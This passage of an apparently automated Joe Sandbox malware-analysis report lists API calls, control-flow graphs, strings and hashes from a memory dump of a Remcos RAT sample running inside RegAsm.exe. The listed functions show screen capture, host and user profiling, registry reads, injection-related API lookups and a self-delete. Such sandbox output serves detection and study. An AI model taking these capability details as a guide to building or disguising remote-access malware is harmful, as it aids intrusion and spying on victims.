                                                                                                                                                                                            • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                                                                                                            • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3950776272-0
                                                                                                                                                                                          • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                                                                          • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                                                                                                          • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                                                                          • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                                                                            • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                                                                                                                                                            • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040F905
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                          • String ID: 5.1.3 Pro$override$pth_unenc
                                                                                                                                                                                          • API String ID: 2281282204-1392497409
                                                                                                                                                                                          • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                                                                                          • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,012D6A98), ref: 004338DA
                                                                                                                                                                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1815803762-0
                                                                                                                                                                                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                                                                          • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                                                                                                                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                                                                          • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Name$ComputerUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4229901323-0
                                                                                                                                                                                          • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                                                                          • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                                                                          • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                          • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                                                                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                                                                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->102 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 90 40ec47-40ec49 81->90 91 40ec4e-40ec55 81->91 94 40ef2c 90->94 95 40ec57 91->95 96 40ec59-40ec65 call 41b354 91->96 94->49 95->96 103 40ec67-40ec69 96->103 104 40ec6e-40ec72 96->104 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->126 103->104 107 40ecb1-40ecc4 call 401e65 call 401fab 104->107 108 40ec74 call 407751 104->108 127 40ecc6 call 407790 107->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->128 117 40ec79-40ec7b 108->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->107 140 40ec9c-40eca2 120->140 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 140->107 144 40eca4-40ecaa 140->144 144->107 147 40ecac call 40729b 144->147 147->107 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 184 40ee4a-40ee54 call 409092 181->184 185 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->185 191 40ee59-40ee7d call 40247c call 434829 184->191 185->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->294 292->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->94 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 357 40f194-40f1a7 call 401e65 call 401fab 347->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 400 40f27b-40f27c SetProcessDEPPolicy 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                                                                            • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                                                                                                                            • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                                                                                                                                            • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                                          • String ID: 8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-UP4CTA$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                                                                                                                          • API String ID: 2830904901-392568153
                                                                                                                                                                                          • Opcode ID: 9233fa00419dd0f2ad7f22ff491c3509d5f47c689b6b828c97f68da7759729ae
                                                                                                                                                                                          • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9233fa00419dd0f2ad7f22ff491c3509d5f47c689b6b828c97f68da7759729ae
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 494 418eb1-418ef8 CreateDCA CreateCompatibleDC call 419360 497 418efa-418efc 494->497 498 418efe-418f19 call 4193a2 494->498 497->498 499 418f1d-418f1f 497->499 498->499 502 418f71-418f78 call 402093 499->502 503 418f21-418f23 499->503 506 418f7d-418f89 502->506 503->502 505 418f25-418f5c call 4193d8 CreateCompatibleBitmap 503->505 509 418f8a-418f94 SelectObject 505->509 510 418f5e-418f6a DeleteDC * 2 505->510 511 418fa5-418fcc StretchBlt 509->511 512 418f96 509->512 513 418f6b DeleteObject 510->513 511->512 515 418fce-418fd3 511->515 514 418f97-418fa3 DeleteDC * 2 512->514 513->502 514->513 516 418fd5-418fea GetCursorInfo 515->516 517 41904f-419057 515->517 516->517 518 418fec-419000 GetIconInfo 516->518 519 419099-4190ab GetObjectA 517->519 520 419059-419060 517->520 518->517 521 419002-41904b DeleteObject * 2 DrawIcon 518->521 519->512 524 4190b1-4190c3 519->524 522 419062-419087 BitBlt 520->522 523 419089-419096 520->523 521->517 522->519 523->519 525 4190c5-4190c7 524->525 526 4190c9-4190d3 524->526 527 419100 525->527 528 4190d5-4190df 526->528 529 419104-41910d 526->529 527->529 528->529 530 4190e1-4190eb 528->530 531 41910e-419148 LocalAlloc 529->531 530->529 532 4190ed-4190f3 530->532 533 419154-41918b GlobalAlloc 531->533 534 41914a-419151 531->534 535 4190f5-4190fb 532->535 536 4190fd-4190ff 532->536 537 419196-4191ab GetDIBits 533->537 538 41918d-419191 533->538 534->533 535->531 536->527 539 4191d3-41929b call 4020df * 2 call 40250a call 403376 call 40250a call 403376 call 40250a call 403376 DeleteObject GlobalFree DeleteDC 537->539 540 4191ad-4191ce DeleteDC * 2 DeleteObject GlobalFree 537->540 538->514 557 4192a0-4192c4 call 402055 call 401fd8 * 2 539->557 558 41929d-41929e DeleteDC 539->558 540->502 557->506 558->557
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                                                                                                            • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                                                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                                                                                                                                          • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00419027
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00419034
                                                                                                                                                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                                                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                                                                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                                                                                                          • GlobalFree.KERNELBASE(?), ref: 00419283
                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00419293
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                                                                                          • String ID: DISPLAY
                                                                                                                                                                                          • API String ID: 4256916514-865373369
                                                                                                                                                                                          • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                                                                                                                          • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                                                                                                                                          • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 565 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 578 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 565->578 579 414faf-414fb6 Sleep 565->579 594 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 578->594 595 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 578->595 579->578 594->595 648 415127-41512e 595->648 649 415119-415125 595->649 650 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 648->650 649->650 677 415210-41521e call 40482d 650->677 678 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 650->678 683 415220-415246 call 402093 * 2 call 41b580 677->683 684 41524b-415260 call 404f51 call 4048c8 677->684 701 415ade-415af0 call 404e26 call 4021fa 678->701 683->701 700 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 684->700 684->701 765 4153bb-4153c8 call 405aa6 700->765 766 4153cd-4153f4 call 401fab call 4135e1 700->766 714 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 701->714 715 415b18-415b20 call 401e8d 701->715 714->715 715->595 765->766 772 4153f6-4153f8 766->772 773 4153fb-415532 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c 766->773 772->773 808 415537-415a51 call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 773->808 1019 415a53-415a5a 808->1019 1020 415a65-415a6c 808->1020 1019->1020 1023 415a5c-415a5e 1019->1023 1021 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 1020->1021 1022 415a6e-415a73 call 40b08c 1020->1022 1034 415aac-415ab8 CreateThread 1021->1034 1035 415abe-415ad9 call 401fd8 * 2 call 401f09 1021->1035 1022->1021 1023->1020 1034->1035 1035->701
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                                                                                                                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
